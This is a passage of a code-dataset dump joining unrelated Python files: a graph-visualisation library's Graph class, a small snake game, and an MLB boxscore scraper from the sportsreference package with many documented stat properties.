d = {"id": self._internal_id, "source": self._source._internal_id, "target": self._target._internal_id, "weight": str(self._weight) if self._weight is not None else "", "directed": self._directed, "lineWidth": self._width, "weightStyle": self._weight_style.data(self), "stroke": self._color.hex_string()}
return d
def __lt__(self, other): return self._priority < other._priority if isinstance(other, Edge) else NotImplemented
def __le__(self, other): return self._priority <= other._priority if isinstance(other, Edge) else NotImplemented
def __gt__(self, other): return self._priority > other._priority if isinstance(other, Edge) else NotImplemented
def __ge__(self, other): return self._priority >= other._priority if isinstance(other, Edge) else NotImplemented
def __str__(self):
return "(" + str(self._source) + "," + str(self._target) + ")"
class Graph:
def __init__(self):
self._nodes = {}
self._edges = []
self._has_edge_cache = {}
self._spread = 80
def add_node(self, *args, **kwds):
if "node" in kwds: n = kwds["node"]
elif len(args) > 0 and isinstance(args[0], Node): n = args[0]
else: n = Node(*args, **kwds)
if n._id in self._nodes: raise Exception("Duplicate node '" + str(n._id) + "'")
self._nodes[n._id] = n
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_node, [n._data()]))
pause(25)
return n
def remove_node(self, node):
n = self.node(node)
pynode_core.enable_events(False)
for e in n.incident_edges():
self.remove_edge(e)
pynode_core.enable_events(True)
del self._nodes[n._id]
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_node, [n._internal_id]))
pause(25)
return n
def node(self, id):
if isinstance(id, Node) and id._id in self._nodes:
return id
elif id in self._nodes:
return self._nodes[id]
else:
return None
def nodes(self):
return list(self._nodes.values())
def add_edge(self, *args, **kwds):
if "edge" in kwds: e = kwds["edge"]
elif len(args) > 0 and isinstance(args[0], Edge): e = args[0]
else:
arg_source = kwds["source"] if "source" in kwds else args[0]
arg_target = kwds["target"] if "target" in kwds else args[1]
arg_weight = kwds["weight"] if "weight" in kwds else args[2] if len(args) > 2 else None
arg_directed = kwds["directed"] if "directed" in kwds else args[3] if len(args) > 3 else False
e = Edge(arg_source, arg_target, arg_weight, arg_directed)
if self.has_edge(e): raise Exception("Instance of edge '" + str(e) + "' already in graph.")
original_source = e._source
original_target = e._target
e._source = graph.node(e._source)
e._target = graph.node(e._target)
if e._source is None: raise Exception("Node '" + str(original_source) + "' doesn't exist.")
if e._target is None: raise Exception("Node '" + str(original_target) + "' doesn't exist.")
e._source._incident_edges.append(e)
e._target._incident_edges.append(e)
self._edges.append(e)
self._has_edge_cache[e] = True
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_edge, [e._data()]))
return e
def remove_edge(self, *args, **kwds):
remove_multiple = False
if "edge" in kwds: edge = kwds["edge"]
elif len(args) > 0 and isinstance(args[0], Edge): edge = args[0]
else:
arg_source = kwds["node1"] if "node1" in kwds else args[0]
arg_target = kwds["node2"] if "node2" in kwds else args[1]
arg_directed = kwds["directed"] if "directed" in kwds else args[2] if len(args) > 2 else False
remove_multiple = True
if remove_multiple:
edge_list = self.edges_between(arg_source, arg_target, arg_directed)
self.remove_all(edge_list)
return edge_list
else:
edge._source._incident_edges.remove(edge)
edge._target._incident_edges.remove(edge)
self._edges.remove(edge)
del self._has_edge_cache[edge]
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_edge, [edge._internal_id]))
return edge
def edges(self):
return list(self._edges)
def set_directed(self, directed=True):
for e in self._edges:
e.set_directed(directed)
def has_node(self, node):
return self.node(node) is not None
def has_edge(self, edge):
return edge in self._has_edge_cache
def adjacent(self, node1, node2, directed=False):
if not self.has_node(node1) or not self.has_node(node2): return False
for n in (self.node(node1).successor_nodes() if directed else self.node(node1).adjacent_nodes()):
if n is self.node(node2): return True
return False
# Deprecated
def adjacent_directed(self, source, target):
return self.adjacent(source, target, True)
def edges_between(self, node1, node2, directed=False):
if not self.has_node(node1) or not self.has_node(node2): return []
edge_list = self.node(node1).outgoing_edges() if directed else self.node(node1)._incident_edges
return [edge for edge in edge_list if edge._target is self.node(node2) or edge._source is self.node(node2)]
# Deprecated
def edges_between_directed(self, source, target):
return self.edges_between(source, target, True)
def adjacency_matrix(self):
m = {}
for r in self._nodes.values():
row = {}
for c in self._nodes.values(): row[c._id] = 0
m[r._id] = row
for r in self._nodes.values():
for c in r.successor_nodes():
m[r._id][c._id] += 1
return m
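# Illustrative shape: for nodes 'a' and 'b' joined by one undirected edge,
# adjacency_matrix() returns {'a': {'a': 0, 'b': 1}, 'b': {'a': 1, 'b': 0}}.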
@staticmethod
def random(order, size, connected=True, mutligraph=False, initial_id=0):
nodes = []
edges = []
adjacency_matrix = [[0 for c in range(order)] for r in range(order)]
edges_remaining = size
id_list = random.sample(range(initial_id, initial_id + order), order)
for i in range(order):
node = Node(id_list[i])
if connected and edges_remaining > 0 and len(nodes) > 0:
connected_node = nodes[random.randint(0, len(nodes) - 1)]
if random.randint(0, 1) == 0: edges.append(Edge(node, connected_node))
else: edges.append(Edge(connected_node, node))
adjacency_matrix[id_list[i] - initial_id][connected_node._id - initial_id] += 1
adjacency_matrix[connected_node._id - initial_id][id_list[i] - initial_id] += 1
edges_remaining -= 1
nodes.append(node)
possible_edges = [(i, j) for i in range(order) for j in range(order)]
random.shuffle(possible_edges)
for e in possible_edges:
if edges_remaining <= 0: break
if (adjacency_matrix[e[0]][e[1]] == 0 and e[0] != e[1]) or mutligraph:
edges.append(Edge(e[0] + initial_id, e[1] + initial_id))
adjacency_matrix[e[0]][e[1]] += 1
adjacency_matrix[e[1]][e[0]] += 1
edges_remaining -= 1
return nodes + edges
def add_all(self, elements):
new_elements = []
pynode_core.enable_events(False)
for x in elements:
if isinstance(x, Node): new_elements.append((0, self.add_node(x)._data()))
elif isinstance(x, Edge): new_elements.append((1, self.add_edge(x)._data()))
else: new_elements.append((0, self.add_node(Node(x))._data()))
pynode_core.enable_events(True)
pynode_core.add_event(pynode_core.Event(pynode_core.js_add_all, [new_elements]))
pause(55)
def remove_all(self, elements):
new_elements = []
pynode_core.enable_events(False)
for x in elements:
if isinstance(x, Node): new_elements.append((0, self.remove_node(x)._data()))
elif isinstance(x, Edge): new_elements.append((1, self.remove_edge(x)._data()))
else: new_elements.append((0, self.remove_node(self.node(x))._data()))
pynode_core.enable_events(True)
pynode_core.add_event(pynode_core.Event(pynode_core.js_remove_all, [new_elements]))
pause(55)
def order(self): return len(self._nodes.values())
def size(self): return len(self._edges)
def set_spread(self, spread=80):
self._spread = spread
pynode_core.add_event(pynode_core.Event(pynode_core.js_set_spread, [spread]))
def clear(self):
self._reset()
pynode_core.add_event(pynode_core.Event(pynode_core.js_clear, []))
def _reset(self):
self._nodes = {}
self._edges = []
self._has_edge_cache = {}
def _exec_code(src):
namespace = locals()
namespace["__name__"] = "__main__"
exec(src, namespace, namespace)
def _execute_function(func, args):
func(*args)
graph = Graph()
``` |
{
"source": "Joseph-D-Bradshaw/pysnake",
"score": 3
} |
#### File: Joseph-D-Bradshaw/pysnake/snake.py
```python
from collections import namedtuple
from enum import Enum
from utils import highlight_cell_at_x_y
Vector = namedtuple('Vector', 'x y')
class Heading(Enum):
NORTH = Vector(0, -1)
EAST = Vector(1, 0)
SOUTH = Vector(0, 1)
WEST = Vector(-1, 0)
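# Each Heading value is a unit step: with Heading.EAST, for example,
# Snake.move() below shifts every part by (+1, 0) on each call.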
class BodyPart:
def __init__(self, x: int, y: int, ref=None, is_head=False):
self.x = x
self.y = y
self.ref = ref
self.is_head = is_head
print(f'LOG CREATION OF PART: {self.__repr__()}')
@property
def next(self):
if type(self.ref) is type(self):
return self.ref
return None
def __repr__(self):
return f'p{id(self)}: ({self.x},{self.y}) -> p{self.next}'
class Snake:
def __init__(self, surface, x: int, y: int):
self._surface = surface
self.head = BodyPart(x, y, is_head=True)
self.heading = Heading.EAST
def draw(self):
part = self.head
highlight_cell_at_x_y(self._surface, part.x, part.y) # draw head
while part.next: # draw rest of the body
part = part.next
highlight_cell_at_x_y(self._surface, part.x, part.y)
def add_part(self):
tail = self.head
while tail.next:
tail = tail.next
# calculate where to add part by heading
x = tail.x - self.heading.value.x
y = tail.y - self.heading.value.y
tail.ref = BodyPart(x, y)
def move(self):
# TODO: Improve move logic so each part moves to the previous parts position
# Doubly Linked List is probably good for this now
part = self.head
while part:
part.x += self.heading.value.x
part.y += self.heading.value.y
part = part.next
``` |
{
"source": "JosephDErwin/sportsreference",
"score": 3
} |
#### File: sportsreference/mlb/boxscore.py
```python
import pandas as pd
import re
from datetime import timedelta
from pyquery import PyQuery as pq
from .. import utils
from ..decorators import float_property_decorator, int_property_decorator
from .constants import (BOXSCORE_ELEMENT_INDEX,
BOXSCORE_SCHEME,
BOXSCORE_URL,
BOXSCORES_URL,
DOUBLE_HEADER_INDICES)
from sportsreference import utils
from sportsreference.constants import AWAY, HOME
from sportsreference.mlb.constants import DAY, NIGHT
from six.moves.urllib.error import HTTPError
class Boxscore(object):
"""
Detailed information about the final statistics for a game.
Stores all relevant information for a game such as the date, time,
location, result, and more advanced metrics such as the number of strikes,
a pitcher's influence on the game, the number of putouts and much more.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
"""
def __init__(self, uri):
self._uri = uri
self._date = None
self._time = None
self._attendance = None
self._venue = None
self._time_of_day = None
self._duration = None
self._away_name = None
self._home_name = None
self._winner = None
self._winning_name = None
self._winning_abbr = None
self._losing_name = None
self._losing_abbr = None
self._away_at_bats = None
self._away_runs = None
self._away_hits = None
self._away_rbi = None
self._away_earned_runs = None
self._away_bases_on_balls = None
self._away_strikeouts = None
self._away_plate_appearances = None
self._away_batting_average = None
self._away_on_base_percentage = None
self._away_slugging_percentage = None
self._away_on_base_plus = None
self._away_pitches = None
self._away_strikes = None
self._away_win_probability_for_offensive_player = None
self._away_average_leverage_index = None
self._away_win_probability_added = None
self._away_win_probability_subtracted = None
self._away_base_out_runs_added = None
self._away_putouts = None
self._away_assists = None
self._away_innings_pitched = None
self._away_home_runs = None
self._away_strikes_by_contact = None
self._away_strikes_swinging = None
self._away_strikes_looking = None
self._away_grounded_balls = None
self._away_fly_balls = None
self._away_line_drives = None
self._away_unknown_bat_type = None
self._away_game_score = None
self._away_inherited_runners = None
self._away_inherited_score = None
self._away_win_probability_by_pitcher = None
self._away_base_out_runs_saved = None
self._home_at_bats = None
self._home_runs = None
self._home_hits = None
self._home_rbi = None
self._home_earned_runs = None
self._home_bases_on_balls = None
self._home_strikeouts = None
self._home_plate_appearances = None
self._home_batting_average = None
self._home_on_base_percentage = None
self._home_slugging_percentage = None
self._home_on_base_plus = None
self._home_pitches = None
self._home_strikes = None
self._home_win_probability_for_offensive_player = None
self._home_average_leverage_index = None
self._home_win_probability_added = None
self._home_win_probability_subtracted = None
self._home_base_out_runs_added = None
self._home_putouts = None
self._home_assists = None
self._home_innings_pitched = None
self._home_home_runs = None
self._home_strikes_by_contact = None
self._home_strikes_swinging = None
self._home_strikes_looking = None
self._home_grounded_balls = None
self._home_fly_balls = None
self._home_line_drives = None
self._home_unknown_bat_type = None
self._home_game_score = None
self._home_inherited_runners = None
self._home_inherited_score = None
self._home_win_probability_by_pitcher = None
self._home_base_out_runs_saved = None
self._parse_game_data(uri)
def _retrieve_html_page(self, uri):
"""
Download the requested HTML page.
Given a relative link, download the requested page and strip it of all
comment tags before returning a pyquery object which will be used to
parse the data.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
Returns
-------
PyQuery object
The requested page is returned as a queriable PyQuery object with
the comment tags removed.
"""
url = BOXSCORE_URL % uri
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_game_date_and_location(self, boxscore):
"""
Retrieve the game's date and location.
The game's meta information, such as date, location, attendance, and
duration, follows a complex parsing scheme that changes based on the
layout of the page. The information should be parsed and set
regardless of the order and amount of information included. To do
this, the meta information is iterated through line-by-line and
fields are determined by the values found in each line.
Parameters
----------
boxscore : PyQuery object
A PyQuery object containing all of the HTML data from the boxscore.
"""
scheme = BOXSCORE_SCHEME["game_info"]
items = [i.text() for i in boxscore(scheme).items()]
game_info = items[0].split('\n')
attendance = None
date = None
duration = None
time = None
time_of_day = None
venue = None
if len(game_info) > 0:
date = game_info[0]
for line in game_info:
if 'Start Time: ' in line:
time = line.replace('Start Time: ', '')
if 'Attendance: ' in line:
attendance = line.replace('Attendance: ', '').replace(',', '')
if 'Venue: ' in line:
venue = line.replace('Venue: ', '')
if 'Game Duration: ' in line:
duration = line.replace('Game Duration: ', '')
if 'Night Game' in line or 'Day Game' in line:
time_of_day = line
setattr(self, '_attendance', attendance)
setattr(self, '_date', date)
setattr(self, '_duration', duration)
setattr(self, '_time', time)
setattr(self, '_time_of_day', time_of_day)
setattr(self, '_venue', venue)
def _parse_name(self, field, boxscore):
"""
Retrieve the team's complete name tag.
Both the team's full name (embedded in the tag's text) and the team's
abbreviation are stored in the name tag which can be used to parse
the winning and losing team's information.
Parameters
----------
field : string
The name of the attribute to parse
boxscore : PyQuery object
A PyQuery object containing all of the HTML data from the boxscore.
Returns
-------
PyQuery object
The complete text for the requested tag.
"""
scheme = BOXSCORE_SCHEME[field]
return boxscore(scheme)
def _parse_game_data(self, uri):
"""
Parses a value for every attribute.
This function looks through every attribute and retrieves the value
according to the parsing scheme and index of the attribute from the
passed HTML data. Once the value is retrieved, the attribute's value is
updated with the returned result.
Note that this method is called directly once Boxscore is invoked and
does not need to be called manually.
Parameters
----------
uri : string
The relative link to the boxscore HTML page, such as
'BOS/BOS201806070'.
"""
boxscore = self._retrieve_html_page(uri)
# If the boxscore is None, the game likely hasn't been played yet and
# no information can be gathered. As there is nothing to grab, the
# class instance should just be empty.
if not boxscore:
return
for field in self.__dict__:
# Remove the '_' from the name
short_field = str(field)[1:]
            if short_field in ('winner', 'winning_name', 'winning_abbr',
                               'losing_name', 'losing_abbr', 'uri', 'date',
                               'time', 'venue', 'attendance', 'time_of_day',
                               'duration'):
                continue
            if short_field in ('away_name', 'home_name'):
                value = self._parse_name(short_field, boxscore)
                setattr(self, field, value)
                continue
            index = BOXSCORE_ELEMENT_INDEX.get(short_field, 0)
value = utils._parse_field(BOXSCORE_SCHEME,
boxscore,
short_field,
index)
setattr(self, field, value)
self._parse_game_date_and_location(boxscore)
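    # A sketch of the flow above: an attribute named '_away_hits' yields the
    # scheme key 'away_hits', which is looked up in BOXSCORE_SCHEME (and in
    # BOXSCORE_ELEMENT_INDEX when multiple elements match) to pull the
    # matching value out of the parsed HTML.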
@property
def dataframe(self):
"""
Returns a pandas DataFrame containing all other class properties and
values. The index for the DataFrame is the string URI that is used to
        instantiate the class, such as 'BOS/BOS201806070'.
"""
if self._away_runs is None and self._home_runs is None:
return None
fields_to_include = {
'date': self.date,
'time': self.time,
'venue': self.venue,
'attendance': self.attendance,
'duration': self.duration,
'time_of_day': self.time_of_day,
'winner': self.winner,
'winning_name': self.winning_name,
'winning_abbr': self.winning_abbr,
'losing_name': self.losing_name,
'losing_abbr': self.losing_abbr,
'away_at_bats': self.away_at_bats,
'away_runs': self.away_runs,
'away_hits': self.away_hits,
'away_rbi': self.away_rbi,
'away_earned_runs': self.away_earned_runs,
'away_bases_on_balls': self.away_bases_on_balls,
'away_strikeouts': self.away_strikeouts,
'away_plate_appearances': self.away_plate_appearances,
'away_batting_average': self.away_batting_average,
'away_on_base_percentage': self.away_on_base_percentage,
'away_slugging_percentage': self.away_slugging_percentage,
'away_on_base_plus': self.away_on_base_plus,
'away_pitches': self.away_pitches,
'away_strikes': self.away_strikes,
'away_win_probability_for_offensive_player':
self.away_win_probability_for_offensive_player,
'away_average_leverage_index': self.away_average_leverage_index,
'away_win_probability_added': self.away_win_probability_added,
'away_win_probability_subtracted':
self.away_win_probability_subtracted,
'away_base_out_runs_added': self.away_base_out_runs_added,
'away_putouts': self.away_putouts,
'away_assists': self.away_assists,
'away_innings_pitched': self.away_innings_pitched,
'away_home_runs': self.away_home_runs,
'away_strikes_by_contact': self.away_strikes_by_contact,
'away_strikes_swinging': self.away_strikes_swinging,
'away_strikes_looking': self.away_strikes_looking,
'away_grounded_balls': self.away_grounded_balls,
'away_fly_balls': self.away_fly_balls,
'away_line_drives': self.away_line_drives,
'away_unknown_bat_type': self.away_unknown_bat_type,
'away_game_score': self.away_game_score,
'away_inherited_runners': self.away_inherited_runners,
'away_inherited_score': self.away_inherited_score,
'away_win_probability_by_pitcher':
self.away_win_probability_by_pitcher,
'away_base_out_runs_saved': self.away_base_out_runs_saved,
'home_at_bats': self.home_at_bats,
'home_runs': self.home_runs,
'home_hits': self.home_hits,
'home_rbi': self.home_rbi,
'home_earned_runs': self.home_earned_runs,
'home_bases_on_balls': self.home_bases_on_balls,
'home_strikeouts': self.home_strikeouts,
'home_plate_appearances': self.home_plate_appearances,
'home_batting_average': self.home_batting_average,
'home_on_base_percentage': self.home_on_base_percentage,
'home_slugging_percentage': self.home_slugging_percentage,
'home_on_base_plus': self.home_on_base_plus,
'home_pitches': self.home_pitches,
'home_strikes': self.home_strikes,
'home_win_probability_for_offensive_player':
self.home_win_probability_for_offensive_player,
'home_average_leverage_index': self.home_average_leverage_index,
'home_win_probability_added': self.home_win_probability_added,
'home_win_probability_subtracted':
self.home_win_probability_subtracted,
'home_base_out_runs_added': self.home_base_out_runs_added,
'home_putouts': self.home_putouts,
'home_assists': self.home_assists,
'home_innings_pitched': self.home_innings_pitched,
'home_home_runs': self.home_home_runs,
'home_strikes_by_contact': self.home_strikes_by_contact,
'home_strikes_swinging': self.home_strikes_swinging,
'home_strikes_looking': self.home_strikes_looking,
'home_grounded_balls': self.home_grounded_balls,
'home_fly_balls': self.home_fly_balls,
'home_line_drives': self.home_line_drives,
'home_unknown_bat_type': self.home_unknown_bat_type,
'home_game_score': self.home_game_score,
'home_inherited_runners': self.home_inherited_runners,
'home_inherited_score': self.home_inherited_score,
'home_win_probability_by_pitcher':
self.home_win_probability_by_pitcher,
'home_base_out_runs_saved': self.home_base_out_runs_saved
}
return pd.DataFrame([fields_to_include], index=[self._uri])
@property
def date(self):
"""
Returns a ``string`` of the date the game took place.
"""
return self._date
@property
def time(self):
"""
Returns a ``string`` of the time the game started.
"""
return self._time
@property
def venue(self):
"""
Returns a ``string`` of the name of the ballpark where the game was
played.
"""
return self._venue
@int_property_decorator
def attendance(self):
"""
Returns an ``int`` of the game's listed attendance.
"""
return self._attendance
@property
def duration(self):
"""
Returns a ``string`` of the game's duration in the format 'H:MM'.
"""
return self._duration
@property
def time_of_day(self):
"""
        Returns a ``string`` constant indicating whether the game was played
during the day or at night.
"""
if 'night' in self._time_of_day.lower():
return NIGHT
return DAY
@property
def winner(self):
"""
Returns a ``string`` constant indicating whether the home or away team
won.
"""
if self.home_runs > self.away_runs:
return HOME
return AWAY
@property
def winning_name(self):
"""
Returns a ``string`` of the winning team's name, such as 'Houston
Astros'.
"""
if self.winner == HOME:
return self._home_name.text()
return self._away_name.text()
@property
def winning_abbr(self):
"""
Returns a ``string`` of the winning team's abbreviation, such as 'HOU'
for the Houston Astros.
"""
if self.winner == HOME:
return utils._parse_abbreviation(self._home_name)
return utils._parse_abbreviation(self._away_name)
@property
def losing_name(self):
"""
        Returns a ``string`` of the losing team's name, such as 'Los Angeles
        Dodgers'.
"""
if self.winner == HOME:
return self._away_name.text()
return self._home_name.text()
@property
def losing_abbr(self):
"""
Returns a ``string`` of the losing team's abbreviation, such as 'LAD'
for the Los Angeles Dodgers.
"""
if self.winner == HOME:
return utils._parse_abbreviation(self._away_name)
return utils._parse_abbreviation(self._home_name)
@int_property_decorator
def away_at_bats(self):
"""
Returns an ``int`` of the number of at bats the away team had.
"""
return self._away_at_bats
@int_property_decorator
def away_runs(self):
"""
Returns an ``int`` of the number of runs the away team scored.
"""
return self._away_runs
@int_property_decorator
def away_hits(self):
"""
Returns an ``int`` of the number of hits the away team had.
"""
return self._away_hits
@int_property_decorator
def away_rbi(self):
"""
Returns an ``int`` of the number of runs batted in the away team
registered.
"""
return self._away_rbi
@float_property_decorator
def away_earned_runs(self):
"""
Returns a ``float`` of the number of runs the away team earned.
"""
return self._away_earned_runs
@int_property_decorator
def away_bases_on_balls(self):
"""
        Returns an ``int`` of the number of bases the away team registered as a
result of balls.
"""
return self._away_bases_on_balls
@int_property_decorator
def away_strikeouts(self):
"""
Returns an ``int`` of the number of times the away team was struck out.
"""
return self._away_strikeouts
@int_property_decorator
def away_plate_appearances(self):
"""
Returns an ``int`` of the number of plate appearances the away team
made.
"""
return self._away_plate_appearances
@float_property_decorator
def away_batting_average(self):
"""
Returns a ``float`` of the batting average for the away team.
"""
return self._away_batting_average
@float_property_decorator
def away_on_base_percentage(self):
"""
        Returns a ``float`` of the percentage of plate appearances that result
        in the batter getting on base.
"""
return self._away_on_base_percentage
@float_property_decorator
def away_slugging_percentage(self):
"""
Returns a ``float`` of the slugging percentage for the away team based
on the number of bases gained per at-bat with bigger plays getting more
weight.
"""
return self._away_slugging_percentage
@float_property_decorator
def away_on_base_plus(self):
"""
        Returns a ``float`` of the on base percentage plus the slugging
        percentage (OPS). Since slugging percentage can exceed 1.0, so can
        this value.
"""
return self._away_on_base_plus
@int_property_decorator
def away_pitches(self):
"""
Returns an ``int`` of the number of pitches the away team faced.
"""
return self._away_pitches
@int_property_decorator
def away_strikes(self):
"""
Returns an ``int`` of the number of times a strike was called against
the away team.
"""
return self._away_strikes
@float_property_decorator
def away_win_probability_for_offensive_player(self):
"""
Returns a ``float`` of the overall influence the away team's offense
had on the outcome of the game where 0.0 denotes no influence and 1.0
denotes the offense was solely responsible for the outcome.
"""
return self._away_win_probability_for_offensive_player
@float_property_decorator
def away_average_leverage_index(self):
"""
Returns a ``float`` of the amount of pressure the away team's pitcher
        faced during the game. 1.0 denotes average pressure while numbers
        less than 1.0 denote lighter pressure.
"""
return self._away_average_leverage_index
@float_property_decorator
def away_win_probability_added(self):
"""
Returns a ``float`` of the total positive influence the away team's
offense had on the outcome of the game.
"""
return self._away_win_probability_added
@float_property_decorator
def away_win_probability_subtracted(self):
"""
Returns a ``float`` of the total negative influence the away team's
offense had on the outcome of the game.
"""
return self._away_win_probability_subtracted
@float_property_decorator
def away_base_out_runs_added(self):
"""
Returns a ``float`` of the number of base out runs added by the away
team.
"""
return self._away_base_out_runs_added
@int_property_decorator
def away_putouts(self):
"""
Returns an ``int`` of the number of putouts the away team registered.
"""
return self._away_putouts
@int_property_decorator
def away_assists(self):
"""
Returns an ``int`` of the number of assists the away team registered.
"""
return self._away_assists
@float_property_decorator
def away_innings_pitched(self):
"""
Returns a ``float`` of the number of innings the away team pitched.
"""
return self._away_innings_pitched
@int_property_decorator
def away_home_runs(self):
"""
Returns an ``int`` of the number of times the away team gave up a home
run.
"""
return self._away_home_runs
@int_property_decorator
def away_strikes_by_contact(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who made contact with the pitch.
"""
return self._away_strikes_by_contact
@int_property_decorator
def away_strikes_swinging(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who was swinging.
"""
return self._away_strikes_swinging
@int_property_decorator
def away_strikes_looking(self):
"""
Returns an ``int`` of the number of times the away team struck out a
batter who was looking.
"""
return self._away_strikes_looking
@int_property_decorator
def away_grounded_balls(self):
"""
Returns an ``int`` of the number of grounded balls the away team
allowed.
"""
return self._away_grounded_balls
@int_property_decorator
def away_fly_balls(self):
"""
Returns an ``int`` of the number of fly balls the away team allowed.
"""
return self._away_fly_balls
@int_property_decorator
def away_line_drives(self):
"""
Returns an ``int`` of the number of line drives the away team allowed.
"""
return self._away_line_drives
@int_property_decorator
def away_unknown_bat_type(self):
"""
Returns an ``int`` of the number of away at bats that were not properly
tracked and therefore cannot be safely placed in another statistical
category.
"""
return self._away_unknown_bat_type
@int_property_decorator
def away_game_score(self):
"""
        Returns an ``int`` of the starting away pitcher's score determined by
many factors, such as number of runs scored against, number of strikes,
etc.
"""
return self._away_game_score
@int_property_decorator
def away_inherited_runners(self):
"""
Returns an ``int`` of the number of runners a pitcher inherited when he
entered the game.
"""
return self._away_inherited_runners
@int_property_decorator
def away_inherited_score(self):
"""
        Returns an ``int`` of the number of inherited runners who scored after
        the pitcher entered the game.
"""
return self._away_inherited_score
@float_property_decorator
def away_win_probability_by_pitcher(self):
"""
Returns a ``float`` of the amount of influence the away pitcher had on
the game's result with 0.0 denoting zero influence and 1.0 denoting he
was solely responsible for the team's win.
"""
return self._away_win_probability_by_pitcher
@float_property_decorator
def away_base_out_runs_saved(self):
"""
Returns a ``float`` of the number of runs saved by the away pitcher
based on the number of players on bases. 0.0 denotes an average value.
"""
return self._away_base_out_runs_saved
@int_property_decorator
def home_at_bats(self):
"""
Returns an ``int`` of the number of at bats the home team had.
"""
return self._home_at_bats
@int_property_decorator
def home_runs(self):
"""
Returns an ``int`` of the number of runs the home team scored.
"""
return self._home_runs
@int_property_decorator
def home_hits(self):
"""
Returns an ``int`` of the number of hits the home team had.
"""
return self._home_hits
@int_property_decorator
def home_rbi(self):
"""
Returns an ``int`` of the number of runs batted in the home team
registered.
"""
return self._home_rbi
@float_property_decorator
def home_earned_runs(self):
"""
Returns a ``float`` of the number of runs the home team earned.
"""
return self._home_earned_runs
@int_property_decorator
def home_bases_on_balls(self):
"""
        Returns an ``int`` of the number of bases the home team registered as a
result of balls.
"""
return self._home_bases_on_balls
@int_property_decorator
def home_strikeouts(self):
"""
Returns an ``int`` of the number of times the home team was struck out.
"""
return self._home_strikeouts
@int_property_decorator
def home_plate_appearances(self):
"""
Returns an ``int`` of the number of plate appearances the home team
made.
"""
return self._home_plate_appearances
@float_property_decorator
def home_batting_average(self):
"""
Returns a ``float`` of the batting average for the home team.
"""
return self._home_batting_average
@float_property_decorator
def home_on_base_percentage(self):
"""
        Returns a ``float`` of the percentage of plate appearances that result
        in the batter getting on base.
"""
return self._home_on_base_percentage
@float_property_decorator
def home_slugging_percentage(self):
"""
Returns a ``float`` of the slugging percentage for the home team based
on the number of bases gained per at-bat with bigger plays getting more
weight.
"""
return self._home_slugging_percentage
@float_property_decorator
def home_on_base_plus(self):
"""
        Returns a ``float`` of the on base percentage plus the slugging
        percentage (OPS). Since slugging percentage can exceed 1.0, so can
        this value.
"""
return self._home_on_base_plus
@int_property_decorator
def home_pitches(self):
"""
Returns an ``int`` of the number of pitches the home team faced.
"""
return self._home_pitches
@int_property_decorator
def home_strikes(self):
"""
Returns an ``int`` of the number of times a strike was called against
the home team.
"""
return self._home_strikes
@float_property_decorator
def home_win_probability_for_offensive_player(self):
"""
Returns a ``float`` of the overall influence the home team's offense
had on the outcome of the game where 0.0 denotes no influence and 1.0
denotes the offense was solely responsible for the outcome.
"""
return self._home_win_probability_for_offensive_player
@float_property_decorator
def home_average_leverage_index(self):
"""
Returns a ``float`` of the amount of pressure the home team's pitcher
        faced during the game. 1.0 denotes average pressure while numbers
        less than 1.0 denote lighter pressure.
"""
return self._home_average_leverage_index
@float_property_decorator
def home_win_probability_added(self):
"""
Returns a ``float`` of the total positive influence the home team's
offense had on the outcome of the game.
"""
return self._home_win_probability_added
@float_property_decorator
def home_win_probability_subtracted(self):
"""
Returns a ``float`` of the total negative influence the home team's
offense had on the outcome of the game.
"""
return self._home_win_probability_subtracted
@float_property_decorator
def home_base_out_runs_added(self):
"""
Returns a ``float`` of the number of base out runs added by the home
team.
"""
return self._home_base_out_runs_added
@int_property_decorator
def home_putouts(self):
"""
Returns an ``int`` of the number of putouts the home team registered.
"""
return self._home_putouts
@int_property_decorator
def home_assists(self):
"""
Returns an ``int`` of the number of assists the home team registered.
"""
return self._home_assists
@float_property_decorator
def home_innings_pitched(self):
"""
Returns a ``float`` of the number of innings the home team pitched.
"""
return self._home_innings_pitched
@int_property_decorator
def home_home_runs(self):
"""
Returns an ``int`` of the number of times the home team gave up a home
run.
"""
return self._home_home_runs
@int_property_decorator
def home_strikes_by_contact(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who made contact with the pitch.
"""
return self._home_strikes_by_contact
@int_property_decorator
def home_strikes_swinging(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who was swinging.
"""
return self._home_strikes_swinging
@int_property_decorator
def home_strikes_looking(self):
"""
Returns an ``int`` of the number of times the home team struck out a
batter who was looking.
"""
return self._home_strikes_looking
@int_property_decorator
def home_grounded_balls(self):
"""
Returns an ``int`` of the number of grounded balls the home team
allowed.
"""
return self._home_grounded_balls
@int_property_decorator
def home_fly_balls(self):
"""
Returns an ``int`` of the number of fly balls the home team allowed.
"""
return self._home_fly_balls
@int_property_decorator
def home_line_drives(self):
"""
Returns an ``int`` of the number of line drives the home team allowed.
"""
return self._home_line_drives
@int_property_decorator
def home_unknown_bat_type(self):
"""
Returns an ``int`` of the number of home at bats that were not properly
tracked and therefore cannot be safely placed in another statistical
category.
"""
return self._home_unknown_bat_type
@int_property_decorator
def home_game_score(self):
"""
        Returns an ``int`` of the starting home pitcher's score determined by
many factors, such as number of runs scored against, number of strikes,
etc.
"""
return self._home_game_score
@int_property_decorator
def home_inherited_runners(self):
"""
Returns an ``int`` of the number of runners a pitcher inherited when he
entered the game.
"""
return self._home_inherited_runners
@int_property_decorator
def home_inherited_score(self):
"""
        Returns an ``int`` of the number of inherited runners who scored after
        the pitcher entered the game.
"""
return self._home_inherited_score
@float_property_decorator
def home_win_probability_by_pitcher(self):
"""
Returns a ``float`` of the amount of influence the home pitcher had on
the game's result with 0.0 denoting zero influence and 1.0 denoting he
was solely responsible for the team's win.
"""
return self._home_win_probability_by_pitcher
@float_property_decorator
def home_base_out_runs_saved(self):
"""
Returns a ``float`` of the number of runs saved by the home pitcher
based on the number of players on bases. 0.0 denotes an average value.
"""
return self._home_base_out_runs_saved
class Boxscores:
"""
Search for MLB games taking place on a particular day.
Retrieve a dictionary which contains a list of all games being played on a
particular day. Output includes a link to the boxscore, and the names and
    abbreviations for both the home and away teams. If no games are played on a
